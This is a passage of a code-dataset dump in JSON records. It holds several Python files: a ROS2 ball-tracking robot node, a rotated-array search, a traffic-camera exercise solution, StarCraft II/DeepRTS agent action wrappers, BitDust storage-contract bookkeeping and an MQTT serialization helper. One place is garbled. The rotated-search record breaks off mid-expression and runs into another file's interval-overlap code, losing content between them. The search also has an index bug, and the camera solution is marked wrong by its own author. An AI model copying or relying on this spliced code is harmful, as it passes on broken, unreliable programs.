enumerate(zip(a+b)):\n print(index,value)\n\n\nprint(zip(a))","repo_name":"doyou1/python_workspace","sub_path":"lecture02_opjects-in-python/lecture2.py","file_name":"lecture2.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41614926742","text":"import rclpy\nfrom rclpy.node import Node\nfrom sensor_msgs.msg import CompressedImage\nfrom geometry_msgs.msg import Twist\nfrom cv_bridge import CvBridge\nimport cv2\nimport numpy as np\n\nclass BallTracker(Node):\n\n def __init__(self):\n super().__init__('ball_tracker')\n\n self.publisher_ = self.create_publisher(Twist, '/cmd_vel', 10)\n timer_period = 0.5 # seconds\n self.timer = self.create_timer(timer_period, self.timer_callback)\n\n self.subscription = self.create_subscription(\n CompressedImage, \n '/image_raw/compressed', \n self.listener_callback, \n 10)\n self.subscription \n\n self.br = 
CvBridge()\n\n self.linear = 0.0\n self.angular = 0.0\n\n # 追従する対象の画像中の幅(画像中の対象物の大きさが常にこの値になるように制御指令を計算する)\n self.target_width = 150\n \n\n def timer_callback(self):\n msg = Twist()\n msg.linear.x = self.linear\n msg.angular.z = self.angular\n self.publisher_.publish(msg)\n\n\n def listener_callback(self, data):\n frame = self.br.compressed_imgmsg_to_cv2(data)\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # 緑色のボールを検出する\n lower_color = np.array([30, 64, 0])\n upper_color = np.array([90,255,255])\n mask = cv2.inRange(hsv, lower_color, upper_color)\n contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n l = a = 0.0\n rects = []\n \n for contour in contours:\n hull = cv2.convexHull(contour)\n rect = cv2.boundingRect(hull)\n rects.append(np.array(rect))\n\n if len(rects) > 0:\n # 面積が最大の領域を抽出\n rect = max(rects, key=(lambda x: x[2] * x[3]))\n cv2.rectangle(frame, tuple(rect[0:2]), tuple(rect[0:2] + rect[2:4]), (0, 0, 255), thickness=2)\n\n x = rect[0]\n y = rect[1]\n w = rect[2]\n h = rect[3]\n cx = int(rect[0]+rect[2]/2)\n cy = int(rect[1]+rect[3]/2)\n\n cv2.drawMarker(frame, (cx, cy), color=(255, 0, 0), markerType=cv2.MARKER_TILTED_CROSS, thickness=2)\n\n # 目標位置との差分を計算する \n dw = 0.005 * (self.target_width - w) # 前後方向\n dx = 0.005 * (640/2 - cx) # 旋回方向\n \n l = 0.0 if abs(dw) < 0.03 else dw # ±10未満ならゼロにする\n # 前後方向のソフトウェアリミッタ\n l = 0.05 if l > 0.05 else l\n l = -0.05 if l < -0.05 else l\n \n a = 0.0 if abs(dx) < 0.3 else dx # ±20未満ならゼロにする\n # 旋回方向のソフトウェアリミッタ\n a = 0.5 if a > 0.5 else a\n a = -0.5 if a < -0.5 else a\n\n\n print('dw=%f l=%f dx=%f a=%f'%(dw, l, dx, a))\n\n self.linear = l\n self.angular = a\n\n cv2.imshow(\"camera\", frame)\n cv2.waitKey(1)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n ball_tracker = BallTracker()\n rclpy.spin(ball_tracker)\n ball_tracker.destroy_node()\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()\n","repo_name":"te260ku/turtle-dog","sub_path":"src/ball_tracking/ball_tracking/ball_tracking.py","file_name":"ball_tracking.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"43073711048","text":"def search_rotated(arr,key):\n start,end= 0,len(arr)-1\n while start<=end:\n mid = start+ (end-start)//2\n if arr[mid] ==key:\n return mid\n \n if arr[start] <= arr[mid] :\n if key >arr[start] and key < arr[mid]:\n end = mid-1\n else:\n start=mid-1\n else:\n if key >arr[mid] and key = section2[0] and section1[1] >= section2[1]:\n return [section1[0], section2[1]]\n elif section1[0] <= section2[0] and section1[1] <= section2[1]:\n return [section2[0], section1[1]]\n elif section1[0] >= section2[0] and section1[1] <= section2[1]:\n return section1\n else:\n return section2\n\n\ndef solution(routes):\n answer = 0\n\n for i in range(len(routes)):\n routes[i].append(abs(routes[i][0] - routes[i][1]))\n\n routes.sort(key=lambda x: x[2]) # 거리로 오름차순 정렬\n\n camera_section = list()\n for s, e, d in routes:\n is_overlap = False\n for i in range(len(camera_section)):\n if check_overlap([s, e], camera_section[i]): # 겹침\n is_overlap = True\n camera_section[i] = get_overlapped([s, e], camera_section[i])\n break\n\n if not is_overlap: # 겹치는 포인트 없음\n camera_section.append([s, e])\n answer += 1\n\n return answer\n\n\nprint(solution([[0, 0], [0, 0], [2, 2]])) # 2\n\n# 
틀림\n","repo_name":"BearHunter49/Algorithm","sub_path":"Programmers/Level3/단속카메라.py","file_name":"단속카메라.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"46186657015","text":"from urnai.agents.actions import sc2 as scaux\nfrom .defeatenemies import DefeatEnemiesDeepRTSActionWrapper, DefeatEnemiesStarcraftIIActionWrapper \nfrom urnai.agents.rewards.scenarios.rts.generalization.buildunits import BuildUnitsGeneralizedRewardBuilder \nfrom pysc2.lib import actions, features, units\nfrom statistics import mean\nfrom pysc2.env import sc2_env\nimport random\n\nclass BuildUnitsDeepRTSActionWrapper(DefeatEnemiesDeepRTSActionWrapper):\n def __init__(self):\n super().__init__()\n self.do_nothing = 17\n self.build_farm = 18\n self.build_barrack = 19\n self.build_footman = 20\n\n self.final_actions = [self.do_nothing, self.build_farm, self.build_barrack, self.build_footman] \n self.named_actions = [\"do_nothing\", \"build_farm\", \"build_barrack\", \"build_footman\"]\n self.action_indices = range(len(self.final_actions))\n\n def solve_action(self, action_idx, obs):\n if action_idx != None:\n if action_idx != self.noaction:\n i = action_idx \n self.action_queue.append(self.final_actions[i])\n else:\n # if action_idx was None, this means that the actionwrapper\n # was not resetted properly, so I will reset it here\n # this is not the best way to fix this\n # but until we cannot find why the agent is\n # not resetting the action wrapper properly\n # i'm gonna leave this here\n self.reset()\n\nclass BuildUnitsStarcraftIIActionWrapper(DefeatEnemiesStarcraftIIActionWrapper):\n\n SUPPLY_DEPOT_X = 42\n SUPPLY_DEPOT_Y = 42\n BARRACK_X = 39\n BARRACK_Y = 36\n\n ACTION_DO_NOTHING = 7\n ACTION_BUILD_SUPPLY_DEPOT = 8\n ACTION_BUILD_BARRACK = 9\n ACTION_BUILD_MARINE = 10\n\n MAP_PLAYER_SUPPLY_DEPOT_COORDINATES = [\n {\"x\" : SUPPLY_DEPOT_X, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 2, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 4, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 6, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 8, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 10, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 12, \"y\" : SUPPLY_DEPOT_Y},\n ]\n\n MAP_PLAYER_BARRACK_COORDINATES = [\n {\"x\" : BARRACK_X, \"y\" : BARRACK_Y},\n {\"x\" : BARRACK_X, \"y\" : BARRACK_Y - 6},\n ]\n\n def __init__(self):\n super().__init__()\n\n self.do_nothing = BuildUnitsStarcraftIIActionWrapper.ACTION_DO_NOTHING\n self.build_supply_depot = BuildUnitsStarcraftIIActionWrapper.ACTION_BUILD_SUPPLY_DEPOT \n self.build_barrack = BuildUnitsStarcraftIIActionWrapper.ACTION_BUILD_BARRACK\n self.build_marine = BuildUnitsStarcraftIIActionWrapper.ACTION_BUILD_MARINE\n self.actions = [self.do_nothing, self.build_supply_depot, self.build_barrack, self.build_marine]\n self.named_actions = [\"do_nothing\", \"build_supply_depot\", \"build_barrack\", \"build_marine\"]\n self.action_indices = range(len(self.actions))\n self.barrack_coords = BuildUnitsStarcraftIIActionWrapper.MAP_PLAYER_BARRACK_COORDINATES\n self.supply_depot_coords = BuildUnitsStarcraftIIActionWrapper.MAP_PLAYER_SUPPLY_DEPOT_COORDINATES\n\n def solve_action(self, action_idx, obs):\n if action_idx != None:\n if action_idx != self.noaction:\n BuildUnitsGeneralizedRewardBuilder.LAST_CHOSEN_ACTION = self.actions[action_idx]\n action = self.actions[action_idx]\n if action == self.do_nothing:\n self.collect_idle(obs)\n elif action == 
self.build_supply_depot:\n self.build_supply_depot_(obs)\n elif action == self.build_barrack:\n self.build_barrack_(obs)\n elif action == self.build_marine:\n self.build_marine_(obs)\n elif action == self.stop:\n self.pending_actions.clear()\n else:\n # if action_idx was None, this means that the actionwrapper\n # was not resetted properly, so I will reset it here\n # this is not the best way to fix this\n # but until we cannot find why the agent is\n # not resetting the action wrapper properly\n # i'm gonna leave this here\n self.reset()\n\n def collect(self, obs):\n #get SCV list\n scvs = scaux.get_my_units_by_type(obs, units.Terran.SCV)\n #get mineral list\n mineral_fields = scaux.get_neutral_units_by_type(obs, units.Neutral.MineralField)\n #split SCVs into sets of numberSCVs/numberOfMinerals\n n = int(len(scvs)/len(mineral_fields))\n scvs_sets = [scvs[i * n:(i + 1) * n] for i in range((len(scvs) + n - 1) // n )]\n #make every set of SCVs collect one mineral \n for i in range(len(mineral_fields)):\n mineral = mineral_fields[i]\n scvset = scvs_sets[i]\n for scv in scvset:\n self.pending_actions.append(actions.RAW_FUNCTIONS.Harvest_Gather_unit(\"queued\", scv.tag, mineral.tag))\n\n def collect_idle(self, obs):\n scv = scaux.get_random_idle_worker(obs, sc2_env.Race.terran)\n mineral = random.choice(scaux.get_neutral_units_by_type(obs, units.Neutral.MineralField))\n if scv != scaux._NO_UNITS: \n self.pending_actions.append(actions.RAW_FUNCTIONS.Harvest_Gather_unit(\"queued\", scv.tag, mineral.tag))\n\n def select_random_scv(self, obs):\n #get SCV list\n scvs = scaux.get_my_units_by_type(obs, units.Terran.SCV)\n length = len(scvs)\n scv = scvs[random.randint(0, length - 1)] \n return scv\n\n def build_supply_depot_(self, obs):\n #randomly select scv\n #get coordinates\n #x, y = BuildUnitsStarcraftIIActionWrapper.SUPPLY_DEPOT_X, BuildUnitsStarcraftIIActionWrapper.SUPPLY_DEPOT_Y\n coord = random.choice(self.supply_depot_coords)\n x, y = coord['x'], coord['y']\n scv = self.select_random_scv(obs)\n #append action to build supply depot\n self.pending_actions.append(actions.RAW_FUNCTIONS.Build_SupplyDepot_pt(\"now\", scv.tag, [x, y]))\n\n def build_barrack_(self, obs):\n #randomly select scv\n #get coordinates\n #x, y = BuildUnitsStarcraftIIActionWrapper.BARRACK_X, BuildUnitsStarcraftIIActionWrapper.BARRACK_Y \n coord = random.choice(self.barrack_coords)\n x, y = coord['x'], coord['y']\n scv = self.select_random_scv(obs)\n #append action to build supply depot\n self.pending_actions.append(actions.RAW_FUNCTIONS.Build_Barracks_pt(\"now\", scv.tag, [x, y]))\n\n def build_marine_(self, obs):\n barracks = scaux.get_my_units_by_type(obs, units.Terran.Barracks)\n if len(barracks) > 0:\n barrack = random.choice(barracks)\n self.pending_actions.append(actions.RAW_FUNCTIONS.Train_Marine_quick(\"now\", barrack.tag))\n","repo_name":"marcocspc/URNAI-Tools","sub_path":"urnai/agents/actions/scenarios/rts/generalization/buildunits.py","file_name":"buildunits.py","file_ext":"py","file_size_in_byte":7031,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"99"} +{"seq_id":"41308664860","text":"_Debug = False\n_DebugLevel = 10\n\n#------------------------------------------------------------------------------\n\nimport os\n\n#------------------------------------------------------------------------------\n\nfrom bitdust.logs import lg\n\nfrom bitdust.lib import utime\nfrom bitdust.lib import strng\nfrom bitdust.lib import jsn\n\nfrom bitdust.system import local_fs\nfrom 
bitdust.system import bpio\n\nfrom bitdust.main import config\nfrom bitdust.main import settings\nfrom bitdust.main import events\n\nfrom bitdust.crypt import key\n\nfrom bitdust.contacts import contactsdb\n\nfrom bitdust.storage import accounting\n\nfrom bitdust.blockchain import bismuth_wallet\n\nfrom bitdust.userid import id_url\n\n#------------------------------------------------------------------------------\n\n\ndef get_customer_contracts_dir(customer_idurl):\n customer_idurl = id_url.field(customer_idurl)\n customer_contracts_prefix = '{}_{}'.format(\n customer_idurl.username,\n strng.to_text(key.HashSHA(customer_idurl.to_public_key(), hexdigest=True)),\n )\n return os.path.join(settings.ServiceDir('service_supplier_contracts'), customer_contracts_prefix)\n\n\ndef get_current_customer_contract(customer_idurl):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if not os.path.isfile(current_customer_contract_path):\n return None\n json_data = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if not json_data:\n return None\n if not accounting.verify_storage_contract(json_data):\n lg.err('current storage contract with %r is not valid' % customer_idurl)\n return None\n return json_data\n\n\ndef is_current_customer_contract_active(customer_idurl):\n current_contract = get_current_customer_contract(customer_idurl)\n if not current_contract:\n return False\n now = utime.utcnow_to_sec1970()\n if now > utime.unpack_time(current_contract['complete_after']):\n return False\n return True\n\n\ndef list_customer_contracts(customer_idurl):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n customer_contracts = {}\n current_contract = None\n latest_contract = None\n latest_contract_state = None\n latest_contract_started_time = -1\n latest_completed_contract = None\n latest_completed_contract_time = -1\n latest_paid_contract = None\n latest_paid_contract_time = -1\n completed_contracts_total_GBH_value = 0\n paid_contracts_total_GBH_value = 0\n for fname in os.listdir(customer_contracts_dir):\n if fname == 'current':\n current_contract = jsn.loads_text(local_fs.ReadTextFile(os.path.join(customer_contracts_dir, 'current')))\n if not accounting.verify_storage_contract(current_contract):\n current_contract = None\n lg.err('current storage contract is invalid')\n continue\n try:\n started_time = int(fname.split('.')[0])\n contract_state = fname.split('.')[1]\n except:\n lg.exc()\n continue\n contract_path = os.path.join(customer_contracts_dir, fname)\n json_data = jsn.loads_text(local_fs.ReadTextFile(contract_path))\n if not accounting.verify_storage_contract(json_data):\n lg.err('invalid storage contract found: %r' % fname)\n continue\n json_data['filename'] = fname\n customer_contracts[started_time] = json_data\n if started_time > latest_contract_started_time:\n latest_contract_started_time = started_time\n latest_contract = json_data\n latest_contract_state = contract_state\n if contract_state == 'completed':\n completed_contracts_total_GBH_value += json_data['value']\n if started_time > latest_completed_contract_time:\n latest_completed_contract = json_data\n elif contract_state == 'cancelled':\n 
completed_contracts_total_GBH_value += json_data['completed_value']\n elif contract_state == 'paid':\n paid_contracts_total_GBH_value += json_data['value']\n if started_time > latest_paid_contract_time:\n latest_paid_contract = json_data\n else:\n raise Exception('unknown state of the contract')\n customer_contracts['current'] = current_contract\n customer_contracts['latest'] = latest_contract\n customer_contracts['latest_state'] = latest_contract_state\n customer_contracts['latest_paid_contract'] = latest_paid_contract\n customer_contracts['latest_completed_contract'] = latest_completed_contract\n customer_contracts['completed_value'] = completed_contracts_total_GBH_value\n customer_contracts['paid_value'] = paid_contracts_total_GBH_value\n if _Debug:\n lg.args(_DebugLevel, completed_value=completed_contracts_total_GBH_value, paid_value=paid_contracts_total_GBH_value)\n return customer_contracts\n\n\ndef prepare_customer_contract(customer_idurl, details):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n now = utime.utcnow_to_sec1970()\n started_time = now\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if os.path.isfile(current_customer_contract_path):\n current_contract = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if current_contract:\n if not accounting.verify_storage_contract(current_contract):\n current_contract = None\n lg.err('current storage contract with %r is not valid' % customer_idurl)\n else:\n if now < utime.unpack_time(current_contract['complete_after']):\n # SCENARIO 2: there is already a contract started with this customer and not yet completed\n if _Debug:\n lg.dbg(_DebugLevel, 'valid customer contract with %r already exists' % customer_idurl)\n return change_current_customer_contract(customer_idurl, details)\n # SCENARIO 3,4,6: found that previous contract was active but finished now\n lg.warn('current storage contract with %r already ended' % customer_idurl)\n complete_current_customer_contract(customer_idurl)\n customer_contracts_list_and_details = list_customer_contracts(customer_idurl)\n latest_contract = customer_contracts_list_and_details['latest']\n latest_contract_state = customer_contracts_list_and_details['latest_state']\n latest_paid_contract = customer_contracts_list_and_details['latest_paid_contract']\n latest_completed_contract = customer_contracts_list_and_details['latest_completed_contract']\n completed_value = customer_contracts_list_and_details['completed_value']\n billing_period_seconds = settings.SupplierContractBillingPeriodDays()*24*60*60\n initial_duration_hours = config.conf().getInt('services/supplier-contracts/initial-duration-hours')\n new_raise_factor = config.conf().getFloat('services/supplier-contracts/duration-raise-factor')\n new_duration_hours = None\n if not latest_contract:\n # SCENARIO 1: this is a new customer - there were no contracts signed yet\n started_time = now\n new_duration_hours = initial_duration_hours\n new_pay_before_time = started_time + int(billing_period_seconds/2.0)\n else:\n if latest_contract_state == 'cancelled':\n cancelled_contract_filename = latest_contract.pop('filename', None)\n if now < utime.unpack_time(latest_contract['complete_after']):\n # SCENARIO 15,16,17: latest contract was cancelled, but customer wants to restart it\n try:\n 
os.remove(os.path.join(customer_contracts_dir, cancelled_contract_filename))\n except:\n lg.exc()\n return start_current_customer_contract(\n customer_idurl=customer_idurl,\n details=details,\n started_time=utime.unpack_time(latest_contract['started']),\n complete_after_time=utime.unpack_time(latest_contract['complete_after']),\n pay_before_time=utime.unpack_time(latest_contract['pay_before']),\n duration_hours=latest_contract['duration_hours'],\n raise_factor=latest_contract['raise_factor'],\n )\n if latest_completed_contract:\n if now - initial_duration_hours*60*60 > utime.unpack_time(latest_completed_contract['pay_before']):\n # SCENARIO 18, 19: latest contract was cancelled and already expired, customer wants to start a new contract\n # other contract was completed, but was not paid\n lg.warn('customer %r yet did not pay for previously completed contract' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'unpaid',\n 'value': completed_value,\n }\n # SCENARIO 11,13: latest contract was cancelled and already expired, other contracts was completed already\n try:\n os.remove(os.path.join(customer_contracts_dir, cancelled_contract_filename))\n except:\n lg.exc()\n # rename cancelled contract file to \".completed\"\n contract_path_new = os.path.join(customer_contracts_dir, '{}.completed'.format(utime.unpack_time(latest_contract['started'])))\n local_fs.WriteTextFile(contract_path_new, jsn.dumps(latest_contract))\n started_time = now\n new_duration_hours = initial_duration_hours\n new_pay_before_time = utime.unpack_time(latest_completed_contract['pay_before'])\n else:\n if latest_paid_contract:\n # SCENARIO 12: latest contract was cancelled and already expired, other contracts was paid\n try:\n os.remove(os.path.join(customer_contracts_dir, cancelled_contract_filename))\n except:\n lg.exc()\n # rename cancelled contract file to \".completed\"\n contract_path_new = os.path.join(customer_contracts_dir, '{}.completed'.format(utime.unpack_time(latest_contract['started'])))\n local_fs.WriteTextFile(contract_path_new, jsn.dumps(latest_contract))\n started_time = now\n new_duration_hours = initial_duration_hours\n new_pay_before_time = started_time + int(billing_period_seconds/2.0)\n else:\n # SCENARIO 10: latest contract was cancelled and already expired, no other contracts found\n # rename cancelled contract file to \".completed\"\n contract_path_new = os.path.join(customer_contracts_dir, '{}.completed'.format(utime.unpack_time(latest_contract['started'])))\n local_fs.WriteTextFile(contract_path_new, jsn.dumps(latest_contract))\n started_time = now\n new_duration_hours = initial_duration_hours\n new_pay_before_time = started_time + int(billing_period_seconds/2.0)\n else:\n started_time = utime.unpack_time(latest_contract['complete_after'])\n new_duration_hours = int(latest_contract['duration_hours']*latest_contract['raise_factor'])\n if latest_contract_state == 'completed':\n if latest_paid_contract:\n new_pay_before_time = utime.unpack_time(latest_paid_contract['started']) + latest_paid_contract['duration_hours']*60*60 + billing_period_seconds\n if new_pay_before_time < started_time + new_duration_hours*60*60:\n # SCENARIO 9: the previous contract is completed and some contracts already paid, but there is still no trust to this customer\n lg.warn('customer %r paid before, but yet did not pay for previously completed contracts' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'unpaid',\n 'value': completed_value,\n }\n else:\n # SCENARIO 7: no active contract, the previos contract 
is completed and there is also a paid contract before\n pass\n else:\n new_pay_before_time = utime.unpack_time(latest_contract['pay_before'])\n if new_pay_before_time < now + new_duration_hours*60*60:\n # SCENARIO 8: the previous contract is completed, but there is no trust to this customer\n lg.warn('customer %r yet did not pay for previously completed contract' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'unpaid',\n 'value': completed_value,\n }\n else:\n # SCENARIO 5: no active contract, the previos contract is completed but there were no payments yet done\n pass\n elif latest_contract_state == 'paid':\n # SCENARIO 14: currently there is no active contract, but the previos contract is completed and paid\n new_duration_hours = initial_duration_hours\n new_pay_before_time = started_time + billing_period_seconds\n else:\n raise Exception('unexpected contract state: %r' % latest_contract_state)\n return start_current_customer_contract(\n customer_idurl=customer_idurl,\n details=details,\n started_time=started_time,\n complete_after_time=started_time + new_duration_hours*60*60,\n pay_before_time=new_pay_before_time,\n duration_hours=new_duration_hours,\n raise_factor=new_raise_factor,\n )\n\n\ndef start_current_customer_contract(customer_idurl, details, started_time, complete_after_time, pay_before_time, duration_hours, raise_factor):\n json_data = {\n 'started': utime.pack_time(started_time),\n 'complete_after': utime.pack_time(complete_after_time),\n 'pay_before': utime.pack_time(pay_before_time),\n 'value': float(duration_hours)*(details['allocated_bytes']/(1024.0*1024.0*1024.0)),\n 'allocated_bytes': details['allocated_bytes'],\n 'duration_hours': duration_hours,\n 'my_position': details['my_position'],\n 'ecc_map': details['ecc_map'],\n 'raise_factor': raise_factor,\n 'wallet_address': bismuth_wallet.my_wallet_address(),\n }\n local_fs.WriteTextFile(os.path.join(get_customer_contracts_dir(customer_idurl), 'current'), jsn.dumps(json_data))\n json_data['customer'] = customer_idurl\n if _Debug:\n lg.args(_DebugLevel, c=json_data)\n events.send('storage-contract-started', data=dict(contract=json_data))\n return json_data\n\n\ndef cancel_customer_contract(customer_idurl):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n if not os.path.isdir(customer_contracts_dir):\n return False\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if not os.path.isfile(current_customer_contract_path):\n return False\n current_contract = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if not current_contract:\n return False\n if not accounting.verify_storage_contract(current_contract):\n lg.err('current contract with %r is not valid' % customer_idurl)\n return False\n cancelled_time = utime.utcnow_to_sec1970()\n completed_duration_hours = (cancelled_time - utime.unpack_time(current_contract['started']))/(60.0*60.0)\n completed_value = float(completed_duration_hours)*(current_contract['allocated_bytes']/(1024.0*1024.0*1024.0))\n current_contract['completed_value'] = completed_value\n current_contract['cancelled'] = utime.pack_time(cancelled_time)\n # rename \"current\" file to \".cancelled\"\n try:\n os.remove(current_customer_contract_path)\n except:\n lg.exc()\n contract_path_new = os.path.join(customer_contracts_dir, '{}.cancelled'.format(utime.unpack_time(current_contract['started'])))\n local_fs.WriteTextFile(contract_path_new, 
jsn.dumps(current_contract))\n if _Debug:\n lg.args(_DebugLevel, old_path=current_customer_contract_path, new_path=contract_path_new)\n current_contract['customer'] = customer_idurl\n events.send('storage-contract-cancelled', data=dict(contract=current_contract))\n return True\n\n\ndef change_current_customer_contract(customer_idurl, details):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if not os.path.isfile(current_customer_contract_path):\n lg.err('current storage contract with %r not found' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'current storage contract not found',\n }\n current_contract = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if not current_contract:\n lg.err('current storage contract with %r read failed' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'current storage contract not found',\n }\n if details.get('ecc_map'):\n current_contract['ecc_map'] = details['ecc_map']\n if details.get('my_position') is not None:\n current_contract['my_position'] = details['my_position']\n if details['allocated_bytes'] != current_contract['allocated_bytes']:\n current_value = current_contract['value']\n new_duration_hours = int(current_value/(details['allocated_bytes']/(1024.0*1024.0*1024.0)))\n new_complete_after_time = utime.unpack_time(current_contract['started']) + new_duration_hours*60*60\n if new_complete_after_time > utime.unpack_time(current_contract['pay_before']):\n return {\n 'deny': True,\n 'reason': 'contract duration change limit exceeded',\n }\n current_contract['allocated_bytes'] = details['allocated_bytes']\n current_contract['duration_hours'] = new_duration_hours\n current_contract['complete_after'] = utime.pack_time(new_complete_after_time)\n if _Debug:\n lg.args(_DebugLevel, c=current_contract)\n local_fs.WriteTextFile(current_customer_contract_path, jsn.dumps(current_contract))\n current_contract['customer'] = customer_idurl\n events.send('storage-contract-changed', data=dict(contract=current_contract))\n return current_contract\n\n\ndef complete_current_customer_contract(customer_idurl):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if not os.path.isfile(current_customer_contract_path):\n return False\n current_contract = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if not current_contract:\n return False\n if not accounting.verify_storage_contract(current_contract):\n lg.err('current contract with %r is not valid' % customer_idurl)\n return False\n # rename \"current\" file to \".completed\"\n contract_path_new = os.path.join(customer_contracts_dir, '{}.completed'.format(utime.unpack_time(current_contract['started'])))\n if _Debug:\n lg.args(_DebugLevel, old_path=current_customer_contract_path, new_path=contract_path_new)\n os.rename(current_customer_contract_path, contract_path_new)\n current_contract['customer'] = customer_idurl\n events.send('storage-contract-completed', data=dict(contract=current_contract))\n return True\n\n\ndef 
verify_all_current_customers_contracts():\n rejected_customers = []\n now = utime.utcnow_to_sec1970()\n for customer_idurl in contactsdb.customers():\n contracts_list = list_customer_contracts(customer_idurl)\n latest_contract = contracts_list['latest']\n if contracts_list['current']:\n if now > utime.unpack_time(contracts_list['current']['complete_after']):\n lg.warn('current storage contract with %r already ended' % customer_idurl)\n complete_current_customer_contract(customer_idurl)\n latest_contract = contracts_list['current']\n if not latest_contract:\n rejected_customers.append(customer_idurl)\n lg.warn('rejecting customer %r because of missing contract' % customer_idurl)\n else:\n if latest_contract.get('cancelled'):\n lg.warn('rejecting customer %r because of cancelled contract' % customer_idurl)\n rejected_customers.append(customer_idurl)\n else:\n next_complete_after_time = utime.unpack_time(latest_contract['complete_after']) + latest_contract['raise_factor']*latest_contract['duration_hours']*60*60\n if now > next_complete_after_time:\n lg.warn('rejecting customer %r because of finished contract' % customer_idurl)\n rejected_customers.append(customer_idurl)\n return rejected_customers\n","repo_name":"bitdust-io/public","sub_path":"bitdust/supplier/storage_contract.py","file_name":"storage_contract.py","file_ext":"py","file_size_in_byte":22451,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"99"} +{"seq_id":"26316253854","text":"import struct\nimport sys\n\nfrom .packettypes import PacketTypes\n\n\nclass MQTTException(Exception):\n pass\n\n\nclass MalformedPacket(MQTTException):\n pass\n\n\ndef writeInt16(length):\n # serialize a 16 bit integer to network format\n return bytearray(struct.pack(\"!H\", length))\n\n\ndef readInt16(buf):\n # deserialize a 16 bit integer from network format\n return struct.unpack(\"!H\", buf[:2])[0]\n\n\ndef writeInt32(length):\n # serialize a 32 bit integer to network format\n return bytearray(struct.pack(\"!L\", length))\n\n\ndef readInt32(buf):\n # deserialize a 32 bit integer from network format\n return struct.unpack(\"!L\", buf[:4])[0]\n\n\ndef writeUTF(data):\n # data could be a string, or bytes. If string, encode into bytes with utf-8\n if sys.version_info[0] < 3:\n data = bytearray(data, 'utf-8')\n else:\n data = data if type(data) == type(b\"\") else bytes(data, \"utf-8\")\n return writeInt16(len(data)) + data\n\n\ndef readUTF(buffer, maxlen):\n if maxlen >= 2:\n length = readInt16(buffer)\n else:\n raise MalformedPacket(\"Not enough data to read string length\")\n maxlen -= 2\n if length > maxlen:\n raise MalformedPacket(\"Length delimited string too long\")\n buf = buffer[2:2+length].decode(\"utf-8\")\n # look for chars which are invalid for MQTT\n for c in buf: # look for D800-DFFF in the UTF string\n ord_c = ord(c)\n if ord_c >= 0xD800 and ord_c <= 0xDFFF:\n raise MalformedPacket(\"[MQTT-1.5.4-1] D800-DFFF found in UTF-8 data\")\n if ord_c == 0x00: # look for null in the UTF string\n raise MalformedPacket(\"[MQTT-1.5.4-2] Null found in UTF-8 data\")\n if ord_c == 0xFEFF:\n raise MalformedPacket(\"[MQTT-1.5.4-3] U+FEFF in UTF-8 data\")\n return buf, length+2\n\n\ndef writeBytes(buffer):\n return writeInt16(len(buffer)) + buffer\n\n\ndef readBytes(buffer):\n length = readInt16(buffer)\n return buffer[2:2+length], length+2\n\n\nclass VariableByteIntegers: # Variable Byte Integer\n \"\"\"\n MQTT variable byte integer helper class. 
